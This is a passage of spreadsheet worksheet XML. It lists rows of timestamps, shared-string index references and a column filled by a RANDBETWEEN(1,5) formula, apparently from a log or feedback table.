    <row r="4178" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4178" s="1">
        <v>43481.14570601852</v>
      </c>
      <c r="B4178" t="s">
        <v>5</v>
      </c>
      <c r="C4178" t="s">
        <v>173</v>
      </c>
      <c r="E4178" t="s">
        <v>4012</v>
      </c>
      <c r="F4178">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4179" s="1">
        <v>43481.119687500002</v>
      </c>
      <c r="B4179" t="s">
        <v>1305</v>
      </c>
      <c r="C4179" t="s">
        <v>10</v>
      </c>
      <c r="D4179" t="s">
        <v>36</v>
      </c>
      <c r="E4179" t="s">
        <v>4013</v>
      </c>
      <c r="F4179">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4180" s="1">
        <v>43481.110879629632</v>
      </c>
      <c r="B4180" t="s">
        <v>19</v>
      </c>
      <c r="C4180" t="s">
        <v>60</v>
      </c>
      <c r="E4180" t="s">
        <v>4014</v>
      </c>
      <c r="F4180">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4181" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4181" s="1">
        <v>43481.097442129627</v>
      </c>
      <c r="B4181" t="s">
        <v>19</v>
      </c>
      <c r="C4181" t="s">
        <v>41</v>
      </c>
      <c r="E4181" t="s">
        <v>4015</v>
      </c>
      <c r="F4181">
        <f t="shared" ca="1" si="65"/>
        <v>2</v>
      </c>
    </row>
    <row r="4182" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4182" s="1">
        <v>43481.086180555554</v>
      </c>
      <c r="B4182" t="s">
        <v>5</v>
      </c>
      <c r="C4182" t="s">
        <v>10</v>
      </c>
      <c r="D4182" t="s">
        <v>36</v>
      </c>
      <c r="E4182" s="2" t="s">
        <v>4016</v>
      </c>
      <c r="F4182">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4183" s="1">
        <v>43481.086157407408</v>
      </c>
      <c r="B4183" t="s">
        <v>35</v>
      </c>
      <c r="C4183" t="s">
        <v>229</v>
      </c>
      <c r="E4183" t="s">
        <v>4017</v>
      </c>
      <c r="F4183">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4184" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4184" s="1">
        <v>43480.973009259258</v>
      </c>
      <c r="B4184" t="s">
        <v>35</v>
      </c>
      <c r="C4184" t="s">
        <v>229</v>
      </c>
      <c r="D4184" t="s">
        <v>312</v>
      </c>
      <c r="E4184" t="s">
        <v>4018</v>
      </c>
      <c r="F4184">
        <f t="shared" ca="1" si="65"/>
        <v>2</v>
      </c>
    </row>
    <row r="4185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4185" s="1">
        <v>43480.937349537038</v>
      </c>
      <c r="B4185" t="s">
        <v>1305</v>
      </c>
      <c r="C4185" t="s">
        <v>139</v>
      </c>
      <c r="F4185">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4186" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4186" s="1">
        <v>43480.798819444448</v>
      </c>
      <c r="B4186" t="s">
        <v>13</v>
      </c>
      <c r="C4186" t="s">
        <v>140</v>
      </c>
      <c r="D4186" t="s">
        <v>847</v>
      </c>
      <c r="E4186" s="2" t="s">
        <v>4019</v>
      </c>
      <c r="F4186">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4187" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4187" s="1">
        <v>43480.775254629632</v>
      </c>
      <c r="B4187" t="s">
        <v>19</v>
      </c>
      <c r="C4187" t="s">
        <v>10</v>
      </c>
      <c r="D4187" t="s">
        <v>6</v>
      </c>
      <c r="E4187" t="s">
        <v>4020</v>
      </c>
      <c r="F4187">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4188" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4188" s="1">
        <v>43480.754004629627</v>
      </c>
      <c r="B4188" t="s">
        <v>5</v>
      </c>
      <c r="C4188" t="s">
        <v>63</v>
      </c>
      <c r="E4188" s="2" t="s">
        <v>4021</v>
      </c>
      <c r="F4188">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4189" s="1">
        <v>43480.732442129629</v>
      </c>
      <c r="B4189" t="s">
        <v>13</v>
      </c>
      <c r="C4189" t="s">
        <v>10</v>
      </c>
      <c r="D4189" t="s">
        <v>52</v>
      </c>
      <c r="E4189" t="s">
        <v>4022</v>
      </c>
      <c r="F4189">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4190" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4190" s="1">
        <v>43480.726875</v>
      </c>
      <c r="B4190" t="s">
        <v>19</v>
      </c>
      <c r="C4190" t="s">
        <v>10</v>
      </c>
      <c r="D4190" t="s">
        <v>46</v>
      </c>
      <c r="E4190" s="2" t="s">
        <v>4023</v>
      </c>
      <c r="F4190">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4191" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4191" s="1">
        <v>43480.710127314815</v>
      </c>
      <c r="B4191" t="s">
        <v>1305</v>
      </c>
      <c r="C4191" t="s">
        <v>10</v>
      </c>
      <c r="D4191" t="s">
        <v>494</v>
      </c>
      <c r="E4191" s="2" t="s">
        <v>4024</v>
      </c>
      <c r="F4191">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4192" s="1">
        <v>43480.697465277779</v>
      </c>
      <c r="B4192" t="s">
        <v>13</v>
      </c>
      <c r="C4192" t="s">
        <v>260</v>
      </c>
      <c r="E4192" t="s">
        <v>4025</v>
      </c>
      <c r="F4192">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4193" s="1">
        <v>43480.683194444442</v>
      </c>
      <c r="B4193" t="s">
        <v>19</v>
      </c>
      <c r="C4193" t="s">
        <v>253</v>
      </c>
      <c r="E4193" t="s">
        <v>4026</v>
      </c>
      <c r="F4193">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4194" s="1">
        <v>43480.67659722222</v>
      </c>
      <c r="B4194" t="s">
        <v>13</v>
      </c>
      <c r="C4194" t="s">
        <v>10</v>
      </c>
      <c r="D4194" t="s">
        <v>89</v>
      </c>
      <c r="E4194" t="s">
        <v>4027</v>
      </c>
      <c r="F4194">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4195" s="1">
        <v>43480.675937499997</v>
      </c>
      <c r="B4195" t="s">
        <v>19</v>
      </c>
      <c r="C4195" t="s">
        <v>10</v>
      </c>
      <c r="D4195" t="s">
        <v>163</v>
      </c>
      <c r="E4195" t="s">
        <v>4028</v>
      </c>
      <c r="F4195">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4196" s="1">
        <v>43480.641585648147</v>
      </c>
      <c r="B4196" t="s">
        <v>19</v>
      </c>
      <c r="C4196" t="s">
        <v>10</v>
      </c>
      <c r="D4196" t="s">
        <v>11</v>
      </c>
      <c r="E4196" t="s">
        <v>4029</v>
      </c>
      <c r="F4196">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4197" s="1">
        <v>43480.61986111111</v>
      </c>
      <c r="B4197" t="s">
        <v>13</v>
      </c>
      <c r="C4197" t="s">
        <v>10</v>
      </c>
      <c r="D4197" t="s">
        <v>1056</v>
      </c>
      <c r="E4197" t="s">
        <v>4030</v>
      </c>
      <c r="F4197">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4198" s="1">
        <v>43480.619826388887</v>
      </c>
      <c r="B4198" t="s">
        <v>13</v>
      </c>
      <c r="C4198" t="s">
        <v>10</v>
      </c>
      <c r="D4198" t="s">
        <v>1056</v>
      </c>
      <c r="E4198" t="s">
        <v>4030</v>
      </c>
      <c r="F4198">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4199" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4199" s="1">
        <v>43480.615601851852</v>
      </c>
      <c r="B4199" t="s">
        <v>19</v>
      </c>
      <c r="C4199" t="s">
        <v>6</v>
      </c>
      <c r="D4199" t="s">
        <v>194</v>
      </c>
      <c r="E4199" s="2" t="s">
        <v>4031</v>
      </c>
      <c r="F4199">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4200" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4200" s="1">
        <v>43480.612581018519</v>
      </c>
      <c r="B4200" t="s">
        <v>1305</v>
      </c>
      <c r="C4200" t="s">
        <v>82</v>
      </c>
      <c r="E4200" s="2" t="s">
        <v>4032</v>
      </c>
      <c r="F4200">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4201" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4201" s="1">
        <v>43480.592245370368</v>
      </c>
      <c r="B4201" t="s">
        <v>5</v>
      </c>
      <c r="C4201" t="s">
        <v>10</v>
      </c>
      <c r="D4201" t="s">
        <v>36</v>
      </c>
      <c r="E4201" s="2" t="s">
        <v>4033</v>
      </c>
      <c r="F4201">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4202" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A4202" s="1">
        <v>43480.579050925924</v>
      </c>
      <c r="B4202" t="s">
        <v>19</v>
      </c>
      <c r="C4202" t="s">
        <v>10</v>
      </c>
      <c r="D4202" t="s">
        <v>46</v>
      </c>
      <c r="E4202" s="2" t="s">
        <v>4034</v>
      </c>
      <c r="F4202">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4203" s="1">
        <v>43480.562638888892</v>
      </c>
      <c r="B4203" t="s">
        <v>13</v>
      </c>
      <c r="C4203" t="s">
        <v>318</v>
      </c>
      <c r="E4203" t="s">
        <v>4035</v>
      </c>
      <c r="F4203">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4204" s="1">
        <v>43480.56082175926</v>
      </c>
      <c r="B4204" t="s">
        <v>19</v>
      </c>
      <c r="C4204" t="s">
        <v>10</v>
      </c>
      <c r="D4204" t="s">
        <v>17</v>
      </c>
      <c r="E4204" t="s">
        <v>4036</v>
      </c>
      <c r="F4204">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4205" s="1">
        <v>43480.500555555554</v>
      </c>
      <c r="B4205" t="s">
        <v>5</v>
      </c>
      <c r="C4205" t="s">
        <v>10</v>
      </c>
      <c r="D4205" t="s">
        <v>17</v>
      </c>
      <c r="E4205" t="s">
        <v>4037</v>
      </c>
      <c r="F4205">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4206" s="1">
        <v>43480.497789351852</v>
      </c>
      <c r="B4206" t="s">
        <v>19</v>
      </c>
      <c r="C4206" t="s">
        <v>6</v>
      </c>
      <c r="D4206" t="s">
        <v>821</v>
      </c>
      <c r="E4206" t="s">
        <v>4038</v>
      </c>
      <c r="F4206">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4207" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4207" s="1">
        <v>43480.496365740742</v>
      </c>
      <c r="B4207" t="s">
        <v>13</v>
      </c>
      <c r="C4207" t="s">
        <v>16</v>
      </c>
      <c r="E4207" s="2" t="s">
        <v>4039</v>
      </c>
      <c r="F4207">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4208" s="1">
        <v>43480.477986111109</v>
      </c>
      <c r="B4208" t="s">
        <v>19</v>
      </c>
      <c r="C4208" t="s">
        <v>65</v>
      </c>
      <c r="E4208" t="s">
        <v>4040</v>
      </c>
      <c r="F4208">
        <f t="shared" ca="1" si="65"/>
        <v>2</v>
      </c>
    </row>
    <row r="4209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4209" s="1">
        <v>43480.471770833334</v>
      </c>
      <c r="B4209" t="s">
        <v>35</v>
      </c>
      <c r="C4209" t="s">
        <v>10</v>
      </c>
      <c r="D4209" t="s">
        <v>271</v>
      </c>
      <c r="E4209" t="s">
        <v>4041</v>
      </c>
      <c r="F4209">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4210" s="1">
        <v>43480.467418981483</v>
      </c>
      <c r="B4210" t="s">
        <v>13</v>
      </c>
      <c r="C4210" t="s">
        <v>6</v>
      </c>
      <c r="D4210" t="s">
        <v>114</v>
      </c>
      <c r="E4210" t="s">
        <v>4042</v>
      </c>
      <c r="F4210">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4211" s="1">
        <v>43480.448923611111</v>
      </c>
      <c r="B4211" t="s">
        <v>1305</v>
      </c>
      <c r="C4211" t="s">
        <v>10</v>
      </c>
      <c r="D4211" t="s">
        <v>6</v>
      </c>
      <c r="E4211" t="s">
        <v>4043</v>
      </c>
      <c r="F4211">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4212" s="1">
        <v>43480.448819444442</v>
      </c>
      <c r="B4212" t="s">
        <v>5</v>
      </c>
      <c r="C4212" t="s">
        <v>45</v>
      </c>
      <c r="D4212" t="s">
        <v>374</v>
      </c>
      <c r="E4212" t="s">
        <v>4044</v>
      </c>
      <c r="F4212">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4213" s="1">
        <v>43480.433888888889</v>
      </c>
      <c r="B4213" t="s">
        <v>5</v>
      </c>
      <c r="C4213" t="s">
        <v>45</v>
      </c>
      <c r="D4213" t="s">
        <v>107</v>
      </c>
      <c r="E4213" t="s">
        <v>4044</v>
      </c>
      <c r="F4213">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4214" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A4214" s="1">
        <v>43480.424872685187</v>
      </c>
      <c r="B4214" t="s">
        <v>5</v>
      </c>
      <c r="C4214" t="s">
        <v>1325</v>
      </c>
      <c r="E4214" s="2" t="s">
        <v>4045</v>
      </c>
      <c r="F4214">
        <f t="shared" ca="1" si="65"/>
        <v>1</v>
      </c>
    </row>
    <row r="4215" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4215" s="1">
        <v>43480.411006944443</v>
      </c>
      <c r="B4215" t="s">
        <v>19</v>
      </c>
      <c r="C4215" t="s">
        <v>10</v>
      </c>
      <c r="D4215" t="s">
        <v>17</v>
      </c>
      <c r="E4215" t="s">
        <v>4046</v>
      </c>
      <c r="F4215">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4216" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4216" s="1">
        <v>43480.407025462962</v>
      </c>
      <c r="B4216" t="s">
        <v>13</v>
      </c>
      <c r="C4216" t="s">
        <v>48</v>
      </c>
      <c r="E4216" s="2" t="s">
        <v>4047</v>
      </c>
      <c r="F4216">
        <f t="shared" ca="1" si="65"/>
        <v>3</v>
      </c>
    </row>
    <row r="4217" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4217" s="1">
        <v>43480.406018518515</v>
      </c>
      <c r="B4217" t="s">
        <v>19</v>
      </c>
      <c r="C4217" t="s">
        <v>10</v>
      </c>
      <c r="D4217" t="s">
        <v>89</v>
      </c>
      <c r="E4217" s="2" t="s">
        <v>4048</v>
      </c>
      <c r="F4217">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4218" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A4218" s="1">
        <v>43480.402881944443</v>
      </c>
      <c r="B4218" t="s">
        <v>1305</v>
      </c>
      <c r="C4218" t="s">
        <v>3049</v>
      </c>
      <c r="E4218" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F4218">
        <f t="shared" ca="1" si="65"/>
        <v>2</v>
      </c>
    </row>
    <row r="4219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4219" s="1">
        <v>43480.388854166667</v>
      </c>
      <c r="B4219" t="s">
        <v>19</v>
      </c>
      <c r="C4219" t="s">
        <v>60</v>
      </c>
      <c r="E4219" t="s">
        <v>4050</v>
      </c>
      <c r="F4219">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4220" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4220" s="1">
        <v>43480.375185185185</v>
      </c>
      <c r="B4220" t="s">
        <v>5</v>
      </c>
      <c r="C4220" t="s">
        <v>10</v>
      </c>
      <c r="D4220" t="s">
        <v>52</v>
      </c>
      <c r="E4220" s="2" t="s">
        <v>4051</v>
      </c>
      <c r="F4220">
        <f t="shared" ca="1" si="65"/>
        <v>2</v>
      </c>
    </row>
    <row r="4221" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4221" s="1">
        <v>43480.363807870373</v>
      </c>
      <c r="B4221" t="s">
        <v>13</v>
      </c>
      <c r="C4221" t="s">
        <v>6</v>
      </c>
      <c r="D4221" t="s">
        <v>25</v>
      </c>
      <c r="E4221" s="2" t="s">
        <v>4052</v>
      </c>
      <c r="F4221">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4222" s="1">
        <v>43480.359131944446</v>
      </c>
      <c r="B4222" t="s">
        <v>5</v>
      </c>
      <c r="C4222" t="s">
        <v>173</v>
      </c>
      <c r="E4222" t="s">
        <v>4053</v>
      </c>
      <c r="F4222">
        <f t="shared" ca="1" si="65"/>
        <v>2</v>
      </c>
    </row>
    <row r="4223" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4223" s="1">
        <v>43480.357789351852</v>
      </c>
      <c r="B4223" t="s">
        <v>1305</v>
      </c>
      <c r="C4223" t="s">
        <v>71</v>
      </c>
      <c r="E4223" s="2" t="s">
        <v>4054</v>
      </c>
      <c r="F4223">
        <f t="shared" ca="1" si="65"/>
        <v>5</v>
      </c>
    </row>
    <row r="4224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4224" s="1">
        <v>43480.35564814815</v>
      </c>
      <c r="B4224" t="s">
        <v>35</v>
      </c>
      <c r="C4224" t="s">
        <v>65</v>
      </c>
      <c r="E4224" t="s">
        <v>4055</v>
      </c>
      <c r="F4224">
        <f t="shared" ca="1" si="65"/>
        <v>2</v>
      </c>
    </row>
    <row r="4225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4225" s="1">
        <v>43480.349351851852</v>
      </c>
      <c r="B4225" t="s">
        <v>19</v>
      </c>
      <c r="C4225" t="s">
        <v>10</v>
      </c>
      <c r="D4225" t="s">
        <v>14</v>
      </c>
      <c r="E4225" t="s">
        <v>4056</v>
      </c>
      <c r="F4225">
        <f t="shared" ca="1" si="65"/>
        <v>4</v>
      </c>
    </row>
    <row r="4226" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4226" s="1">
        <v>43480.347060185188</v>
      </c>
      <c r="B4226" t="s">
        <v>13</v>
      </c>
      <c r="C4226" t="s">
        <v>776</v>
      </c>
      <c r="E4226" s="2" t="s">
        <v>4057</v>
      </c>
      <c r="F4226">
        <f t="shared" ref="F4226:F4289" ca="1" si="66">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="4227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4227" s="1">
        <v>43480.329733796294</v>
      </c>
      <c r="B4227" t="s">
        <v>5</v>
      </c>
      <c r="C4227" t="s">
        <v>6</v>
      </c>
      <c r="D4227" t="s">
        <v>25</v>
      </c>
      <c r="E4227" t="s">
        <v>4058</v>
      </c>
      <c r="F4227">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4228" s="1">
        <v>43480.298425925925</v>
      </c>
      <c r="B4228" t="s">
        <v>35</v>
      </c>
      <c r="C4228" t="s">
        <v>686</v>
      </c>
      <c r="E4228" t="s">
        <v>4059</v>
      </c>
      <c r="F4228">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4229" s="1">
        <v>43480.284756944442</v>
      </c>
      <c r="B4229" t="s">
        <v>35</v>
      </c>
      <c r="C4229" t="s">
        <v>4060</v>
      </c>
      <c r="E4229" t="s">
        <v>4061</v>
      </c>
      <c r="F4229">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4230" s="1">
        <v>43480.281377314815</v>
      </c>
      <c r="B4230" t="s">
        <v>19</v>
      </c>
      <c r="C4230" t="s">
        <v>173</v>
      </c>
      <c r="E4230" t="s">
        <v>4062</v>
      </c>
      <c r="F4230">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4231" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4231" s="1">
        <v>43480.280752314815</v>
      </c>
      <c r="B4231" t="s">
        <v>13</v>
      </c>
      <c r="C4231" t="s">
        <v>48</v>
      </c>
      <c r="E4231" s="2" t="s">
        <v>4063</v>
      </c>
      <c r="F4231">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4232" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A4232" s="1">
        <v>43480.265196759261</v>
      </c>
      <c r="B4232" t="s">
        <v>5</v>
      </c>
      <c r="C4232" t="s">
        <v>65</v>
      </c>
      <c r="E4232" s="2" t="s">
        <v>4064</v>
      </c>
      <c r="F4232">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4233" s="1">
        <v>43480.239386574074</v>
      </c>
      <c r="B4233" t="s">
        <v>19</v>
      </c>
      <c r="C4233" t="s">
        <v>48</v>
      </c>
      <c r="E4233" t="s">
        <v>4065</v>
      </c>
      <c r="F4233">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4234" s="1">
        <v>43480.238391203704</v>
      </c>
      <c r="B4234" t="s">
        <v>35</v>
      </c>
      <c r="C4234" t="s">
        <v>454</v>
      </c>
      <c r="E4234" t="s">
        <v>4066</v>
      </c>
      <c r="F4234">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4235" s="1">
        <v>43480.201481481483</v>
      </c>
      <c r="B4235" t="s">
        <v>5</v>
      </c>
      <c r="C4235" t="s">
        <v>50</v>
      </c>
      <c r="E4235" t="s">
        <v>4067</v>
      </c>
      <c r="F4235">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4236" s="1">
        <v>43480.173055555555</v>
      </c>
      <c r="B4236" t="s">
        <v>5</v>
      </c>
      <c r="C4236" t="s">
        <v>253</v>
      </c>
      <c r="E4236" t="s">
        <v>4068</v>
      </c>
      <c r="F4236">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4237" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4237" s="1">
        <v>43480.159155092595</v>
      </c>
      <c r="B4237" t="s">
        <v>19</v>
      </c>
      <c r="C4237" t="s">
        <v>60</v>
      </c>
      <c r="E4237" s="2" t="s">
        <v>4069</v>
      </c>
      <c r="F4237">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4238" s="1">
        <v>43480.149189814816</v>
      </c>
      <c r="B4238" t="s">
        <v>5</v>
      </c>
      <c r="C4238" t="s">
        <v>10</v>
      </c>
      <c r="D4238" t="s">
        <v>374</v>
      </c>
      <c r="F4238">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4239" s="1">
        <v>43480.143622685187</v>
      </c>
      <c r="B4239" t="s">
        <v>13</v>
      </c>
      <c r="C4239" t="s">
        <v>586</v>
      </c>
      <c r="D4239" t="s">
        <v>114</v>
      </c>
      <c r="E4239" t="s">
        <v>4070</v>
      </c>
      <c r="F4239">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4240" s="1">
        <v>43480.139675925922</v>
      </c>
      <c r="B4240" t="s">
        <v>13</v>
      </c>
      <c r="C4240" t="s">
        <v>41</v>
      </c>
      <c r="E4240" t="s">
        <v>4071</v>
      </c>
      <c r="F4240">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4241" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4241" s="1">
        <v>43480.131550925929</v>
      </c>
      <c r="B4241" t="s">
        <v>1305</v>
      </c>
      <c r="C4241" t="s">
        <v>314</v>
      </c>
      <c r="E4241" s="2" t="s">
        <v>4072</v>
      </c>
      <c r="F4241">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4242" s="1">
        <v>43480.118136574078</v>
      </c>
      <c r="B4242" t="s">
        <v>19</v>
      </c>
      <c r="C4242" t="s">
        <v>10</v>
      </c>
      <c r="D4242" t="s">
        <v>17</v>
      </c>
      <c r="F4242">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4243" s="1">
        <v>43480.113333333335</v>
      </c>
      <c r="B4243" t="s">
        <v>5</v>
      </c>
      <c r="C4243" t="s">
        <v>559</v>
      </c>
      <c r="E4243" t="s">
        <v>4073</v>
      </c>
      <c r="F4243">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4244" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4244" s="1">
        <v>43480.086712962962</v>
      </c>
      <c r="B4244" t="s">
        <v>19</v>
      </c>
      <c r="C4244" t="s">
        <v>124</v>
      </c>
      <c r="E4244" s="2" t="s">
        <v>4074</v>
      </c>
      <c r="F4244">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4245" s="1">
        <v>43480.082280092596</v>
      </c>
      <c r="B4245" t="s">
        <v>13</v>
      </c>
      <c r="C4245" t="s">
        <v>10</v>
      </c>
      <c r="D4245" t="s">
        <v>6</v>
      </c>
      <c r="E4245" t="s">
        <v>3461</v>
      </c>
      <c r="F4245">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4246" s="1">
        <v>43480.082268518519</v>
      </c>
      <c r="B4246" t="s">
        <v>13</v>
      </c>
      <c r="C4246" t="s">
        <v>10</v>
      </c>
      <c r="D4246" t="s">
        <v>6</v>
      </c>
      <c r="E4246" t="s">
        <v>3461</v>
      </c>
      <c r="F4246">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4247" s="1">
        <v>43480.07534722222</v>
      </c>
      <c r="B4247" t="s">
        <v>13</v>
      </c>
      <c r="C4247" t="s">
        <v>73</v>
      </c>
